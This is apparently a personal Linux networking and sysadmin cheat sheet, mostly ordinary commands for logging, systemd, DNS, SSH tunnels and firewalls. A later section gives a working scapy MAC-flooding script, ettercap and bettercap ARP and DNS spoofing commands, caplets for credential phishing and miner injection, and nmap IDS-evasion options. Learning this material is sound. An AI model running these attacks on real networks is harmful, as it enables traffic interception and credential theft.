    - `/var/dumps/core.%e.%p` to store core dumps in a centralized location
  - Variables
    - `%e`: Executable name
    - `%p`: PID
    - `%t`: Timestamp (epoch)
    - `%h`: Hostname
    - `%u`: RUID
  - Ephemeral modification (persists until reboot)
    - Write to `/proc/sys/kernel/core_pattern`
  - Persistent modification
    - Create the drop-in `/etc/sysctl.d/99-coredump.conf`
    - Insert `kernel.core_pattern = <core-pattern>`
    - `sysctl --system` to reload the configuration
    - Alternative method (not recommended: prefer the drop-in configuration to preserve this default)
      - `sysctl -w 'kernel.core_pattern = <core-pattern>'` to overwrite the current rule
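A sketch of the persistent drop-in described above (the `/var/dumps` destination and file name are illustrative; the directory must exist and be writable by the dumping processes):

```
# /etc/sysctl.d/99-coredump.conf -- hypothetical example
kernel.core_pattern = /var/dumps/core.%e.%p.%t
```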
- `rsyslog`
- `sar` (collect, report, or save system activity information; from `sysstat`)
  - `-b` for I/O statistics
  - `-n <type>` for network statistics
    - `--iface=<iface>` for a specific network interface
  - Example: `sar -n TCP 1` to print TCP statistics for all interfaces every 1 second
- `dmesg` (print or control the kernel ring buffer)
  - `dmesg -Tw` to show log messages in human-readable time format (`-T`) and in real time (`-w`)
  - `dmesg | head` to see the early kernel command line options (TODO: Why is this different than shown in `cat /proc/cmdline`?)
  - `dmesg | tail` to see the latest log messages
- `/var/log/` contains log files
  - `dmesg` for the kernel ring buffer (hardware and driver)
  - `apt/history.log` for package install/removal history
  - `syslog` (Ubuntu) or `messages` (Red Hat) for daemon logs, system messages, and non-authorization events
  - `auth.log` (Ubuntu) or `secure` (Red Hat) for authorization attempts (logins, SSH, etc)
  - `journal/` for binary `systemd` journal files managed by `systemd-journald`
    - See: the section on `journalctl`; `/run/log/journal` for volatile `tmpfs` journals; `man tmpfs`
  - ...and more
- `loki`
- `syslog`
- `logger`
- `auditd`
- `lspci` (list all PCI devices)
- `lsusb` (list USB devices)
- `iostat` (report Central Processing Unit (CPU) statistics and input/output statistics for devices and partitions; from `sysstat`)
  - `iostat [interval [count]] [-d] [device-name]` to report block device statistics
  - `-c` to report CPU statistics
  - `-x` for extended statistics
  - `-z` to omit statistics for devices showing no activity
- `lscpu` (display information about the CPU architecture)
- `chcpu` (configure CPUs)
- `mpstat` (report processor-related statistics; from `sysstat`)
  - See `iostat`
  - `mpstat` to print a summary CPU utilization report
  - `mpstat 1` to print a report every 1 second
  - `-P ALL` to print statistics for all processors
- `nproc` (print the number of processing units available)
- `cat /proc/cpuinfo` to see CPU specs and info
  - `cat /proc/cpuinfo | grep -c processor` to count the number of processors
- `cat /proc/meminfo` to see detailed memory information
- `free` (display amount of free and used memory in the system)
  - `-h` for human-readable
  - `-t` to include total
  - `-m` to display in mebibytes
- `vmstat -S M` (show virtual memory statistics in units of MB (`-S M`))
- NOTE: See `man systemd`
- `systemctl` (control the systemd system and service manager; this is `systemd`'s control interface)
  - `systemctl status` to show runtime status info on the whole system
  - `systemctl status <unit>` to show runtime status info for a unit
  - `systemctl show <unit>` to show the properties of a unit
  - `systemctl cat <unit>` to show the backing files of one or more units
  - `systemctl restart <unit>` to restart a systemd unit
  - `systemctl list-units` to list units `systemd` currently has in memory
  - `systemctl list-sockets` to list socket units currently in memory, ordered by listening addresses
  - `systemctl list-timers` to list timer units currently in memory, ordered by when they elapse next
- `journalctl` (print log entries from the systemd journal)
  - Storage location and format
    - Journals are stored in binary format
    - Persistent journals are stored in `/var/log/journal/`, volatile journals in `/run/log/journal/` (see section on logging)
    - `journalctl` merges both sources in output
  - `journalctl -f` to see log messages in real time
  - `journalctl -b` to see all logs since boot of current session
  - `journalctl -u wpa_supplicant` to see logs pertaining to the `wpa_supplicant` service
- `resolvectl` (resolve domain names, IPv4 and IPv6 addresses, DNS resource records, and services; introspect and reconfigure the DNS resolver)
  - Front-end (or sometimes a symlink) to `systemd-resolve` and primary way of interacting with `systemd-resolved`
  - `/etc/resolv.conf` is the standard DNS resolver configuration file for specifying DNS nameservers, usually managed by `systemd-resolved`, but sometimes by `netplan` and others depending on distro and configuration choice
  - `resolvectl` to display the global and per-link DNS settings currently in effect
  - Options
    - `status <link>` to display the DNS settings currently in effect for a link
    - `query <hostname|address>`
    - `statistics` to display general resolver statistics, including whether DNSSEC is enabled and available, as well as resolution and validation statistics
    - `show-server-state` to display detailed server state information, per DNS server
    - `monitor` to display a continuous stream of local client resolution queries and their responses
    - `flush-caches`
- `systemd-resolve` (deprecated in favor of `resolvectl`)
- `systemd-analyze` (analyze and debug system manager)
  - `systemd-analyze blame` to print all running units, ordered by initialization time
man systemd:
CONCEPTS systemd provides a dependency system between various entities called "units" of 11 different types. Units encapsulate various objects that are relevant for system boot-up and maintenance. The majority of units are configured in unit configuration files, whose syntax and basic set of options is described in systemd.unit(5), however some are created automatically from other configuration files, dynamically from system state or programmatically at runtime. Units may be "active" (meaning started, bound, plugged in, ..., depending on the unit type, see below), or "inactive" (meaning stopped, unbound, unplugged, ...), as well as in the process of being activated or deactivated, i.e. between the two states (these states are called "activating", "deactivating"). A special "failed" state is available as well, which is very similar to "inactive" and is entered when the service failed in some way (process returned error code on exit, or crashed, an operation timed out, or after too many restarts). If this state is entered, the cause will be logged, for later reference. Note that the various unit types may have a number of additional substates, which are mapped to the five generalized unit states described here.
The following unit types are available: 1. Service units, which start and control daemons and the processes they consist of. For details, see systemd.service(5). 2. Socket units, which encapsulate local IPC or network sockets in the system, useful for socket-based activation. For details about socket units, see systemd.socket(5), for details on socket-based activation and other forms of activation, see daemon(7). 3. Target units are useful to group units, or provide well-known synchronization points during boot-up, see systemd.target(5). 4. Device units expose kernel devices in systemd and may be used to implement device-based activation. For details, see systemd.device(5). 5. Mount units control mount points in the file system, for details see systemd.mount(5). 6. Automount units provide automount capabilities, for on-demand mounting of file systems as well as parallelized boot-up. See systemd.automount(5). 7. Timer units are useful for triggering activation of other units based on timers. You may find details in systemd.timer(5). 8. Swap units are very similar to mount units and encapsulate memory swap partitions or files of the operating system. They are described in systemd.swap(5). 9. Path units may be used to activate other services when file system objects change or are modified. See systemd.path(5). 10. Slice units may be used to group units which manage system processes (such as service and scope units) in a hierarchical tree for resource management purposes. See systemd.slice(5). 11. Scope units are similar to service units, but manage foreign processes instead of starting them as well. See systemd.scope(5). Units are named as their configuration files. Some units have special semantics. A detailed list is available in systemd.special(7).
- `/etc/hosts.allow` (deprecated)
- `/etc/nsswitch.conf` contains configuration for DNS resolution order, as well as for other items
- `/etc/hosts` contains static DNS configuration (short-circuits external DNS resolution attempts)
  - `192.168.0.100 myserver`
- Mix and match: watch DNS traffic halt after manually resolving DNS lookups locally
  - `tcpdump port 53` to monitor port 53 (DNS) traffic
  - `watch -n 0 arp` to make `arp` run repeatedly very quickly so we can see it attempt to resolve the IP addresses stored in the ARP cache to names for display
  - Add `<ip-addr> <name>` to `/etc/hosts`, save it, and watch the external DNS traffic disappear due to resolving via the local hosts file
- `/etc/services` lists default port service designations
- See `resolvectl` in systemd for configuration of DNS resolvers
- `host` (DNS lookup utility)
- `arping`
  - `arping -i eth0 192.168.0.51` to ARP ping that host via interface `eth0`
- `iftop` (display bandwidth usage on an interface by host)
- `ifstat` (report interface activity, just like iostat/vmstat do for other system statistics)
- `knock` (port-knock client from the `knockd` package)
  - `knock myserver.example.com 123:tcp 456:udp 789:tcp` to test knock sequences on those ports on that server (I think)
- `socat` (multipurpose relay (SOcket CAT))
- `curl`
  - `curl ifconfig.me` to get WAN IP address
  - `-L` to follow redirects
  - `-v` for verbose output (often very useful)
- `cowrie` (SSH/Telnet honeypot; https://docs.cowrie.org/en/latest/index.html)
  - `host1$ docker run -p 2222:2222 cowrie:latest`
  - `host2$ ssh root@localhost -p 2222`
- `dhclient`
- `dhcpcd` (a DHCP client)
  - `--release`
  - `--rebind`
  - `--renew`
  - `--dumplease [interface]` to dump lease information for all interfaces or for a specific one
- `netplan`
  - Logging
    - `/var/log/cloud-init-output.log` contains log info
    - `/var/log/cloud-init.log` contains log info
      - NOTE! This log file can contain plaintext SSIDs and passwords when configuring wireless networking
  - Configuration
    - `/etc/netplan/50-cloud-init.yaml` is the default network configuration file for the user
    - See `man netplan` for configuration details and https://netplan.readthedocs.io/en/0.105/examples.html for examples
  - `--debug` to enable debug messages
  - `netplan status`
  - `netplan generate`
  - `netplan try` to temporarily apply `netplan` configuration changes for testing and apply if confirmed
  - `netplan apply` to apply `netplan` configuration changes
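As a sketch of what such a file can look like — a hypothetical static-IP configuration in the style of the netplan examples linked above (the file name, interface name, addresses, and nameservers are all placeholders):

```yaml
# /etc/netplan/99-static.yaml — hypothetical example
network:
  version: 2
  ethernets:
    eth0:
      dhcp4: false
      addresses: [192.168.0.50/24]
      routes:
        - to: default
          via: 192.168.0.1
      nameservers:
        addresses: [1.1.1.1, 8.8.8.8]
```

Prefer `netplan try` over `netplan apply` when testing, since a bad config rolls back automatically if not confirmed.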
- See `netcat`
- See `telnet` (TODO)
- `scp` (OpenSSH secure file copy)
- `rsync` (a fast, versatile, remote (and local) file-copying tool)
  - `rsync -vaz large-directory <user>@<host>:<path>` will verbosely (`-v`) compress (`-z`) and recursively copy (`-a`, also preserving metadata) a directory to another host over SSH
- `sftp`
- See `dnsutils`?
- `host` (DNS lookup utility)
- `iperf3` (perform network throughput tests)
  - `iperf3 -s` to listen
  - `iperf3 -c <address>` to connect
- `mtr` (a network diagnostic tool)
  - Combines the functionality of the `traceroute` and `ping` programs in a single network diagnostic tool
  - `mtr -t` runs `mtr` in terminal mode
- `nmap`
  - Do read the book: https://nmap.org/book/toc.html. Useful chapters:
    - https://nmap.org/book/nmap-overview-and-demos.html
In a pen-testing situation, you often want to scan every host even if they do not seem to be up. After all, they could just be heavily filtered in such a way that the probes you selected are ignored but some other obscure port may be available. To scan every IP whether it shows an available host or not, specify the -Pn option instead of all of the above.
    - https://nmap.org/book/nmap-phases.html
    - See https://nmap.org/book/legal-issues.html for practical suggestions on continuing exploration while avoiding trouble with ISPs, system administrators, and the law
  - Generally, you don't want to run the default scan settings, which do a bunch of things in an untargeted, unstealthy, and extremely fingerprintable way (default Nmap behavior is easily identifiable). Typically, you'll want to start with a few different types of host discovery scans before making different types of port scans. In the real world, you won't run a single comprehensive scan against even a mildly advanced target; you'll break the penetration up into multiple chunks executed across time delays. The point: you must come up with your own usage strategies depending on your scenario, because the defaults will not do -- you actually have to understand things.
  - `-oA myscan-%D` outputs results in every format to files named `myscan-<date>.<extension>`
  - `-v` verbose mode shows additional detail, including less reliable guesses on targets, depending on the scan type
  - `-Pn` to treat all hosts as online (skip host discovery)
  - Port scanning:
    - Manpage: The state is either open, filtered, closed, or unfiltered. Open means that an application on the target machine is listening for connections/packets on that port. Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. Closed ports have no application listening on them, though they could open up at any time. Ports are classified as unfiltered when they are responsive to Nmap's probes, but Nmap cannot determine whether they are open or closed. Nmap reports the state combinations open|filtered and closed|filtered when it cannot determine which of the two states describe a port.
    - `-sn` to disable port scanning
    - `-sS` for TCP SYN scan (requires root)
      - The default scan type when running as root
      - Fast, reliable, and relatively unobtrusive and stealthy
      - AKA "half-open" scanning, because you don't complete TCP connections; you just send the request to establish a connection and then drop it, awaiting the response to determine port status
    - `-sT` for TCP connect scan
      - The default scan type when not running as root
    - `-sV` enables version scanning
    - `-sC` enables script scanning
    - `-p-` to scan all 65,535 ports rather than the 1,000 most common
    - `-A` enables `-O`, `-sV`, `-sC`, and `--traceroute`
    - `-sI` to perform an idle (zombie) scan
      - Typically used with `-Pn` to prevent pings originating from the true IP, in keeping with the point of `-sI`
    - `-n` to disable reverse DNS resolution
    - `-O` enables OS detection
    - `--traceroute` enables traceroute
    - `--packet-trace` details the packets being sent
    - `-iL <file>` to read target hosts from a file
    - `-T<template>` to set the dynamic timing template for a particular scan type
      - Manpage: The first two are for IDS evasion. Polite mode slows down the scan to use less bandwidth and target machine resources. Normal mode is the default and so -T3 does nothing. Aggressive mode speeds scans up by making the assumption that you are on a reasonably fast and reliable network. Finally insane mode assumes that you are on an extraordinarily fast network or are willing to sacrifice some accuracy for speed.
      - `paranoid` or `0`; `sneaky` or `1`; `polite` or `2`; `normal` or `3`; `aggressive` or `4`; `insane` or `5`
    - Uses ARP requests by default for LAN-based host discovery
- `tracepath` (traces path to a network host discovering MTU along this path; from `iputils`; typically use `traceroute` instead)
- `traceroute` (print the route packets trace to network host)
  - `traceroute google.com` traces the route from you to `google.com`
  - You can use `whois <host>` to assess different hops and see who the traffic is being routed through
- `whois` (client for the whois directory service)
  - `whois <host>`
- `ngrep` (network grep)
- `tcpdump` (dump traffic on a network)
  - Compared to `tshark`: quick and simple filtering; lightweight and widely available (pre-installed on most systems); uses `libpcap` for backend
  - `tcpdump ip` to monitor only IPv4 traffic
  - `tcpdump not host <host>` to monitor all traffic not associated with `<host>`
  - `tcpdump -p` to monitor traffic destined to or originating from our host (disable promiscuous mode)
  - `tcpdump port <port> or host <host>` to monitor a specific port or host's traffic
  - `tcpdump -w traffic.cap` to capture traffic to `traffic.cap`
  - `tcpdump -r traffic.cap` to read traffic from `traffic.cap`
  - `-c <capture-count>` to stop capturing after `<capture-count>` packets
- `tshark` (dump and analyze network traffic; TUI version of Wireshark)
  - Compared to `tcpdump`: generally just richer; more complex filtering; deep protocol analysis; more scriptable; prettier output; more output formats; more protocols; uses `libpcap` plus a dissection engine for backend
  - Filters
    - Capture and display filters use entirely different syntax
    - `tshark -f 'not host <host>'` to capture traffic with a capture filter
      - or `tshark not host <host>` as shorthand
    - `tshark -Y 'ip.addr==<addr>'` to capture traffic and apply a display filter to output
    - Capture filters are much more efficient than display filters
    - A capture filter applies to all interfaces if specified before the first `-i` option, and to the last `-i` interface if specified after the first `-i` option
    - Capture filters can be specified multiple times
  - `tshark --hexdump all host <host> and port <port>` to print a full hexdump (`--hexdump all`) of traffic captured that matches the specified host and port
- See https://scapy.readthedocs.io/en/latest/usage.html
- The `help` builtin is useful as always (mostly not sarcastic)
- `ls` (list available layers, or info on a given layer class or name)
  - `ls()` to list layers
  - `ls(layer)` to list info on a layer
  - `ls(ICMP)` to see the fields of the ICMP packet protocol
  - `ls(ICMP())` to see the fields of the ICMP packet protocol after initialization (shows default init values)
- Sending and Receiving
  - Layer 3 (standard)
    - `send(packets, iface=None)` to send packets at layer 3
    - `sr(packets)` to send/receive packets at layer 3
  - Layer 2 (specify custom `Ether` header)
    - `sendp(packets, iface=None)` to send packets at layer 2
    - `srp(packets)` to send/receive packets at layer 2
  - `ans,unans = _` to read the latest packets received
  - `response.summary()` and `response.show()` both print a summary of details of a response
- Crafting
  - `<packet2>/<packet1>` to stack `<packet1>` within `<packet2>`
    - Eg, `packet = IP(dst='google.com') / ICMP()` crafts an ICMP ping packet
  - `dhcp_discover_packet = Ether(src='00:11:22:33:44:55', dst='ff:ff:ff:ff:ff:ff') / IP(src='0.0.0.0', dst='255.255.255.255') / UDP(sport=68, dport=67) / BOOTP(chaddr=b'\x00\x11\x22\x33\x44\x55') / DHCP(options=[('message-type', 'discover'), 'end'])` (note: a functional discover needs the `UDP` and `BOOTP` layers underneath `DHCP`)
    - `sendp(dhcp_discover_packet)`
  - Make and inspect two DNS queries, one to `1.1.1.1` (Cloudflare's DNS) and one to `8.8.8.8` (Google's DNS)
    - (See DNS record query types: https://en.wikipedia.org/wiki/List_of_DNS_record_types)

```python
dns_query_packet = IP(dst=['1.1.1.1', '8.8.8.8']) / UDP(dport=53) / DNS(qd=DNSQR(qname='secdev.org', qtype='A'))
results, unanswered = sr(dns_query_packet)

# 1) Inspect both DNS queries and answers...
for query, answer in results:
    query.show()   # Equivalent to results[<idx>].query.show()
    answer.show()  # Equivalent to results[<idx>].answer.show()

# 2) ...or just inspect the first DNS query and answer
results[0].query.show()
results[0].answer.show()
```
- Sniffing (Capturing) and Inspecting
  - `sniff` (sniff packets and return a list of packets)
    - `sniff(offline='traffic.cap')` to read a packet capture file instead of sniffing
    - `sniff()` to sniff on all interfaces
    - `sniff(iface=<interface>, prn=<function>, filter=<filter>)` to sniff on a particular interface and apply a function to each packet
      - Example function: `prn=lambda p: p.summary()`
      - Example filter: `filter='port 80'`
  - Sniff HTTP requests:

```python
from scapy.all import IP, sniff
from scapy.layers.http import HTTPRequest

def process_packet(packet):
    if packet.haslayer(HTTPRequest):
        url = packet[HTTPRequest].Host.decode() + packet[HTTPRequest].Path.decode()
        ip = packet[IP].src
        method = packet[HTTPRequest].Method.decode()
        print(f'[+] {ip} Requested {url} with {method}')

# Start sniffing the network on the default interface for HTTP traffic
sniff(filter='port 80', prn=process_packet, store=False)
```
- `wrpcap('traffic.cap', packets)` to write captured packets to a packet capture file
- `rdpcap('traffic.cap')` to read a packet capture file
- `traceroute('google.com')` to run a traceroute on `google.com`
- `tshark()` to sniff (capture) and print packets in a `tshark`-like format
- `wireshark(packets)` to run Wireshark on a pre-captured list of packets
- There are one-liners available to perform ARP cache poisoning
- CAM overflow / MAC flooding (https://github.com/0xbharath/scapy-scripts)
```python
#!/usr/bin/env python
#-------------------------------------------------------------------------------#
# A script to perform CAM overflow attack on Layer 2 switches                   #
# Bharath (github.com/yamakira)                                                 #
#                                                                               #
# CAM Table Overflow is all about flooding a switch's CAM table                 #
# with a lot of fake MAC addresses to drive the switch into HUB mode.           #
#-------------------------------------------------------------------------------#

from scapy.all import Ether, IP, RandIP, RandMAC, sendp

def generate_packets():
    '''Fill packet_list with ten thousand random Ethernet packets.

    CAM overflow attacks need to be super fast. For that reason it's
    better to create a packet list beforehand.
    '''
    packet_list = []
    for i in range(1, 10000):
        packet = Ether(src=RandMAC(), dst=RandMAC()) / IP(src=RandIP(), dst=RandIP())
        packet_list.append(packet)
    return packet_list

def cam_overflow(packet_list):
    # sendpfast(packet_list, iface='tap0', mbps=...) is the faster alternative
    sendp(packet_list, iface='tap0')

if __name__ == '__main__':
    packet_list = generate_packets()
    cam_overflow(packet_list)
```
- `ettercap` (multipurpose sniffer/content filter for man-in-the-middle attacks; version > 0.7.0) TODO: Test this more thoroughly and come up with more examples
  - `ettercap -T`
  - `ettercap -T -M arp:local -P dns_spoof <targets-spec>` to start a TUI-based `ettercap` session (`-T`), activate an ARP-based MITM attack targeting localhost (`-M arp:local`), and run the `dns_spoof` plugin (`-P dns_spoof`), all against targets `<targets-spec>`
  - `<targets-spec>`:
    - Takes the form of `MAC/IPs/ports`
    - `11:22:33:44:55:66/192.168.0-1.0-255,10.0.0.1/0-20` to specify a target of that MAC address, those IPs, and those ports
    - `//0-20` to specify a target of any MAC address, any IP, and ports 0-20
  - `/etc/ettercap/etter.dns` (host file for the dns_spoof plugin; specifies target host file modifications during a DNS spoofing attack)
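For reference, a sketch of what `etter.dns` entries look like — the record format is `name type address`, and wildcards are supported; the domain and address below are placeholders:

```
# /etc/ettercap/etter.dns (excerpt) — hypothetical entries
example.com      A   192.168.0.99
*.example.com    A   192.168.0.99
```

Any target resolving `example.com` during the spoofing attack would then be steered to `192.168.0.99`.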
- `bettercap` is a newer version of `ettercap` which primarily operates interactively (a standard tool in MITM)
  - https://www.bettercap.org/
  - Caplets (NOTE: Most of the vulnerabilities that these exploit are supposedly older and ineffective)
    - `bettercap -caplet /usr/local/share/bettercap/caplets/crypto-miner.cap -eval "set arp.spoof.targets 10.10.10.102"` to use a caplet
    - `crypto-miner.cap` - Deploy crypto-mining JavaScript in all HTTP requests
    - `local-sniffer.cap` - Use Bettercap as a local sniffer with protocol-filtering options
    - `login-man-abuse.cap` - Exploit browser built-in login managers to steal credentials
    - `fb-phish.cap` - Create a fake Facebook login page to collect credentials
    - `rogue-mysql-server.cap` - Impersonate and intercept MySQL server connections
    - `simple-passwords-sniffer.cap` - Capture any network activity with `password=` in the payload
    - `stsoy.cap` - Spoof all DNS responses for Microsoft and Google, serving up BeEF hooks
    - `web-override.cap` - Replace every unencrypted web page with a static page of the adversary's choosing
  - `bettercap -iface eth0` to start an interactive session (you should specify an interface so it doesn't choose loopback)
    - `help` to show help
    - `help <module>` to show status of a module and available commands
  - `net.show` to show the list of cached hosts
  - `net.recon` module (periodically read the ARP cache in order to monitor for new hosts on the network; passive monitoring of ARP cache to determine hosts on network)
    - `help net.recon` to show help for the `net.recon` module
    - `net.recon on` to start host discovery (on by default)
    - `net.recon off` to stop host discovery
  - `net.probe` module (keep probing for new hosts on the network by sending dummy UDP packets to every possible IP on the subnet; active probing to determine hosts on network)
    - `net.probe on`
    - `net.probe off`
    - Observe:
      - `net.probe on`
      - `tcpdump arp` to see ARP requests continuously being fired out
      - `watch -n 0 arp -n` to see ARP requests continuously being received (`-n` to avoid spamming DNS requests due to running `arp` repeatedly via `watch`)
      - `net.probe off` and see it all stop
  - `arp.spoof` module (keep spoofing selected hosts on the network)
    - `set arp.spoof.targets <IP1,IP2,...>` to set IP addresses to target, comma-separated
    - `arp.spoof on` to start spoofing
    - `arp.spoof off` to stop spoofing
  - `dns.spoof` module (replies to DNS messages with spoofed responses)
    - `dns.spoof on`
    - `dns.spoof off`
    - `set dns.spoof.address <address>` to set the IP address to return for spoofed DNS answers
    - `set dns.spoof.domains <domain1,domain2,...>` to set a list of domain targets for DNS spoofing, comma-separated
    - `set dns.spoof.all <bool>` to perform DNS spoofing for all requests regardless of domain or hosts file
    - `set dns.spoof.hosts <hostsfile>` to perform DNS spoofing for the entries mapped in `<hostsfile>`
- `proxychains`
  - `proxychains` captures the network traffic (eg, Nmap TCP scan pings) of any given command and redirects it through proxies specified in the configuration file
  - Configuration: `/etc/proxychains(4).conf`
    - You can specify which proxies (eg, `socks4 127.0.0.1 9050`) to go through, how to go through them, timeouts, and more
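A sketch of the relevant parts of that configuration file, following the stock `proxychains4.conf` layout (the timeout values are illustrative):

```
# /etc/proxychains4.conf (excerpt)
strict_chain            # traverse ProxyList in order; all proxies must be up
proxy_dns               # resolve DNS through the chain too (avoids DNS leaks)
tcp_read_time_out 15000
tcp_connect_time_out 8000

[ProxyList]
# type  host       port
socks4  127.0.0.1  9050
```

`proxy_dns` matters in practice: without it, name resolution bypasses the chain and leaks your true origin.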
  - `ssh -NR 9050 10.90.50.200` to set up a remote SSH SOCKS proxy (see section on SSH)
    - Port `9050` because it's the default localhost proxy specified in the `proxychains` configuration file
    - `proxychains nmap -vv 192.168.0.0/24` on the remote to tunnel `nmap` network traffic through the SSH SOCKS proxy, which encrypts and masks the network traffic
    - Observe the scan through Wireshark and note that the encrypted scan traffic appears to originate from the client rather than the remote (`10.90.50.200`)
- `ssh-copy-id` (use locally available keys to authorise logins on a remote machine)
  - `-v` can be useful when troubleshooting
- `~/.ssh/authorized_keys` on a server contains the public keys of client users allowed to connect to your server account via SSH
- `~/.ssh/known_hosts` on a client's machine contains the public host keys of servers (stored on the server in `/etc/ssh/ssh_host_*_key.pub`) previously connected to or otherwise known
  - This is used to detect MITM attacks by having the server verify its identity
  - SSH clients will usually warn and ask for confirmation on new or changed (eg, domain provides a different public host key than known) server public host keys before going through the handshake signature for full public/private keypair verification
- `/etc/ssh/ssh_host_..._key.pub` files on a server are the server's public host key files, used by the SSH daemon to authenticate the server
- Modifying `~/.ssh/config` with...

  ```
  Host myserver
      HostName 192.168.1.10
      User yourusername
      IdentityFile ~/.ssh/id_ed25519
      Port 2220
  ```

  ...allows you to do `ssh myserver` as a shorthand for future connections
- `ssh -N` (do not execute a remote command; useful for just forwarding ports)
- Local SSH Tunnel
  - `ssh -L [<client>:]<client-port>:<host>:<host-port> <remote>` to set up an SSH tunnel from `<client>` (`localhost` if not specified) on port `<client-port>` to `<host>:<host-port>` via `<remote>`
  - `ssh -NL 1234:unixwiz.net:80 192.168.0.71` to set up a local SSH tunnel to `unixwiz.net:80` via `192.168.0.71`
    - Use `localhost:1234` to communicate with `unixwiz.net:80`, using `192.168.0.71` as proxy
      - Eg, `curl localhost:1234` sends a `GET` request to `unixwiz.net:80` via `192.168.0.71`, which then forwards the reply back to the client
    - `ss -tpl` shows `127.0.0.1:1234` listening locally
    - This is observable through Wireshark. You won't see any requests to `unixwiz.net:80` originating from the client, just `192.168.0.71`
    - `curl` doesn't know anything about the forwarding. It simply makes the request, and SSH forwards it back and forth between the client and server.
- Reverse (Remote) SSH Tunnel
  - `ssh -R <remote-port>:<host>:<host-port> <remote>` to set up a reverse SSH tunnel from `<remote>:<remote-port>` to `<host>:<host-port>` via the client
    - Allows the remote to use tools from their machine as if they were on the client's network, rather than having to move their tools to the client
    - NOTE; VERIFY THIS: You'll have to proxy some of your tools' network traffic through the SSH tunnel client, since the tools you're running (eg, `nmap`) may encode your IP as the origin before being sent through the SSH tunnel client (see section on `proxychains`)
    - Eg, with a web service forwarded locally to their machine, they can interact with that service the way they'd interact with any service accessible via their machine
  - `ssh -NR 1234:unixwiz.net:80 192.168.0.71` to set up a reverse SSH tunnel from `192.168.0.71:1234` to `unixwiz.net:80` via the client
    - Use `localhost:1234` on the remote to communicate with `unixwiz.net`, using the client as proxy
    - `ss -tpl` on the remote shows `127.0.0.1:1234` listening locally
  - `ssh -NR 1234:192.168.0.1:80 10.90.50.200`
    - Allows the remote at `10.90.50.200`, listening on their `localhost:1234`, to communicate with the client's router `192.168.0.1:80`, via the client on their internal network
    - `ss -tpl` on the remote shows `127.0.0.1:1234` listening locally
    - Opening `localhost:1234` in a browser will allow the remote to interact with the client's router
- Dynamic Reverse (Remote) SSH Tunnel using SOCKS proxy
  - SOCKS (Wikipedia: SOCKS is an Internet protocol that exchanges network packets between a client and server through a proxy server)
    - `curl` and most browsers support SOCKS, while most other tools do not
  - `ssh -NR 1234 10.90.50.200` to set up a dynamic reverse SSH SOCKS tunnel
    - `curl -vL --socks4 127.0.0.1:1234 unixwiz.net` on the remote to make a `GET` request to `unixwiz.net` via the client
    - `curl -vL --socks4 127.0.0.1:1234 192.168.0.1` on the remote to make a `GET` request to the client's router via the client
- Dynamic Local SSH Tunnel using SOCKS proxy
  - Use to enter the server's network
  - `ssh -ND 1234 10.90.50.200` on the client to set up a local SSH SOCKS proxy on `localhost:1234`, forwarding via server `10.90.50.200`
    - `curl -vL --socks4 127.0.0.1:1234 unixwiz.net` on the client to make a `GET` request to `unixwiz.net` via the server
    - `curl -vL --socks4 127.0.0.1:1234 192.168.0.1` on the client to make a `GET` request to the server's router via the server
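These ad-hoc flags can also be captured in `~/.ssh/config`; a hypothetical sketch mirroring the `-L` and `-D` examples above (the host aliases are made up):

```
# ~/.ssh/config — hypothetical entries mirroring the -L and -D examples
Host tunnel-web
    HostName 192.168.0.71
    LocalForward 1234 unixwiz.net:80    # like ssh -NL 1234:unixwiz.net:80

Host socks-entry
    HostName 10.90.50.200
    DynamicForward 1234                 # like ssh -ND 1234
```

Then `ssh -N tunnel-web` or `ssh -N socks-entry` brings the forward up without retyping the port spec.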
- `iptables` was used to manage Linux's netfilter firewall framework, with `ufw` as a front-end utility; `ufw` is supposedly transitioning into a front-end for the preferred `nftables`. `iptables` is now considered legacy in favor of `nftables`. All three utilities are still widely available.
nft is the command line tool used to set up, maintain and inspect packet filtering and classification rules in the Linux kernel, in the nftables framework. The Linux kernel subsystem is known as nf_tables, and ‘nf’ stands for Netfilter
- `ufw`
  - `ufw enable` to enable the firewall
  - `ufw disable` to disable the firewall
  - `ufw reload` to reload the firewall
  - `ufw reset` to reset the firewall
  - `ufw status numbered` to view the firewall status with numbered rules
  - `ufw allow 22` to allow port 22
  - `ufw deny from 1.2.3.4` to deny an IP
  - `ufw delete 1` to delete rule 1
- `iptables`
  - `iptables --version` displays the program version and the kernel API used (eg, `nf_tables`)
  - `iptables -t nat -L` to list (`-L`) NAT table (`-t nat`) rules
  - `iptables -t nat -D POSTROUTING 1` to delete (`-D`) the first (`1`) NAT table rule in the `POSTROUTING` chain
  - `iptables -t nat -A POSTROUTING -s 192.168.0.0/16 -o ens4 -j MASQUERADE` to NAT-forward traffic from a range of hosts via our IP address
    - Requires (I think) `sysctl -w net.ipv4.ip_forward=1` to allow IP forwarding at all on the host
    - `-n` displays IP addresses instead of resolved names (eg, `0.0.0.0/0` instead of `anywhere`)
    - `-t nat` specifies that we're working with the NAT table rules
    - `-A POSTROUTING` appends to the `POSTROUTING` chain
      - A chain is where along the chain of processing a rule is applied
      - The `POSTROUTING` chain applies rules to traffic after routing decisions have already been made, but before the traffic leaves the system
    - `-s 192.168.0.0/16` specifies the source range of IP addresses that the rule matches
    - `-o ens4` specifies which interface to send matching traffic out through
    - `-j MASQUERADE` specifies the match action for the rule (what to do when the rule matches)
      - The `MASQUERADE` action (AKA `MASQ`) maps the source IP address of matching traffic to our IP address
      - It is only available in the NAT table in the `POSTROUTING` chain
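To make that MASQUERADE rule survive a reboot, it can be stored in `iptables-restore` format — the kind of file `iptables-persistent` typically loads from `/etc/iptables/rules.v4`; a sketch using the same subnet and interface as the example above:

```
# /etc/iptables/rules.v4 (excerpt) — load manually with: iptables-restore < rules.v4
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s 192.168.0.0/16 -o ens4 -j MASQUERADE
COMMIT
```

Each table starts with `*<table>`, lists chain policies as `:CHAIN POLICY [pkts:bytes]`, then rules, then `COMMIT`. Remember the `ip_forward` sysctl still has to be enabled separately.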
- NOTE: Exact syntax depends on `netcat-traditional` vs `netcat-openbsd` vs `nmap`'s `ncat`, and the exact version
  - `netcat-traditional` requires `-p` to specify the port when listening, while `netcat-openbsd` does not
- `nc <address> 22` to see if SSH is running on a host
- Scan: `nc -z <host> 1-65535` to scan all ports on `<host>` (may wish to add `-v` to print per-port results)
- Simple communication
  - `host1$ nc -l -p 1234` to listen on a host
  - `host2$ nc <host1> 1234` to send traffic to the listening host
  - `host3$ nc <host1> 1234 -c "<command>"` to send the `stdout` of `<command>` to the listening host and close the connection
